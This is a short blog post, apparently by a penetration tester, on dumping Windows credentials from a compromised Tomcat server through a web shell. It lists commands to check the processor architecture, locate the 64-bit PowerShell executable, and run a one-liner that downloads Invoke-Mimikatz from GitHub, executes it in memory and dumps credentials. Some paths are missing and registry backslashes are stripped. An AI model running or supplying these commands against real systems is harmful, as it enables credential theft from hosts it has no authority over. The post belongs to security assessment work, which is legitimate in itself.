A while back I was messing around with Tomcat and it got me thinking when I come across Tomcat during assessments it is normally running as system or some kind of admin account. Sometimes I don’t want to/cant use metasploit and I just have the web shell. I could create a user and log in that way but one of the first things I would do is run Mimikatz so why not just do it form the web shell nothing stopping you really so I compiled some commands that would let me run the Invoke-Mimikatz powershell commandlet. Later I then decided to should make the commands automated in a JSP file going forward and I did which can be found here[embed]https://player.vimeo.com/video/109617452[/embed]
So here is a quick run though of what I was doing:
1. Determine the architecture, because if the system is x64 and Tomcat is the x86 the powershell launched will be 32-bit and Invoke-Mimikatz won’t work since it cant read the 64-bit lssas process’’. The way I did this was a quick registry query the command is:
reg query "HKLMSYSTEMCurrentControlSetControlSession ManagerEnvironment" /v PROCESSOR_ARCHITECTURE
2. Find the appropriate install of powershell if it is a 64-bit system. According to multiple sources the 64-bit powershell should be at
but on none of the systems I tested on had powershell there so I had to go looking for it. After some poking around i noticed that on all of my 64-bit test systems there was a folder that started with
followed by hashes and version information that had the 64-bit powershell which could call. The command I use to find the powershell exe is:
dir /S %windir%\powershell.exe.
3. After the appropriate powershell instance is found I then run Invoke-Mimikatz.ps1 file by executing the file after downloading it from either Github
or a local copy if you cant reach external addresses by using:
powershell "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds"